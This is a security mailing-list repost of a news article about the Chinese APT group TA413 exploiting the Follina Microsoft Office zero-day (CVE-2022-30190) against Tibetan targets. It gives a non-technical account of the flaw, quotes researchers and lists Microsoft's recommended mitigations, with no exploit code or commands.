[BreachExchange] Chinese Hackers Begin Exploiting Latest Microsoft Office Zero-Day Vulnerability

[Matthew Wheeler]

https://thehackernews.com/2022/05/chinese-hackers-begin-exploiting-latest.html

An advanced persistent threat (APT) actor aligned with Chinese state
interests has been observed weaponizing the new zero-day flaw in Microsoft
Office to achieve code execution on affected systems.

"TA413 CN APT spotted [in-the-wild] exploiting the Follina zero-day using
URLs to deliver ZIP archives which contain Word Documents that use the
technique," enterprise security firm Proofpoint said in a tweet.

"Campaigns impersonate the 'Women Empowerments Desk' of the Central Tibetan
Administration and use the domain tibet-gov.web[.]app."

TA413 is best known for its campaigns aimed at the Tibetan diaspora to
deliver implants such as Exile RAT and Sepulcher as well as a rogue Firefox
browser extension dubbed FriarFox.

The high-severity security flaw, dubbed Follina and tracked as
CVE-2022-30190 (CVSS score: 7.8), relates to a case of remote code
execution that abuses the "ms-msdt:" protocol URI scheme to execute
arbitrary code.

Specifically, the attack makes it possible for threat actors to circumvent
Protected View safeguards for suspicious files by simply changing the
document to a Rich Text Format (RTF) file, thereby allowing the injected
code to be run without even opening the document via the Preview Pane in
Windows File Explorer.

While the bug gained widespread attention last week, evidence points to
active exploitation of the diagnostic tool flaw in real-world attacks
targeting Russian users over a month ago on April 12, 2022, when it was
disclosed to Microsoft.

The company, however, did not deem it a security issue and closed the
vulnerability submission report, citing reasons that the MSDT utility
requires a passkey provided by a support technician before it can execute
payloads.

The vulnerability exists in all currently supported Windows versions and
can be exploited via Microsoft Office versions Office 2013 through Office
21 and Office Professional Plus editions.

"This elegant attack is designed to bypass security products and fly under
the radar by leveraging Microsoft Office's remote template feature and the
ms-msdt protocol to execute malicious code, all without the need for
macros," Malwarebytes' Jerome Segura noted.

Although there is no official patch available at this point, Microsoft has
recommended disabling the MSDT URL protocol to prevent the attack vector.
Additionally, it's been advised to turn off the Preview Pane in File
Explorer.

"What makes 'Follina' stand out is that this exploit does not take
advantage of Office macros and, therefore, it works even in environments
where macros have been disabled entirely," Nikolas Cemerikic of Immersive
Labs said.

"All that's required for the exploit to take effect is for a user to open
and view the Word document, or to view a preview of the document using the
Windows Explorer Preview Pane. Since the latter does not require Word to
launch fully, this effectively becomes a zero-click attack."
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.riskbasedsecurity.com/pipermail/breachexchange/attachments/20220601/0c37d0c2/attachment.html>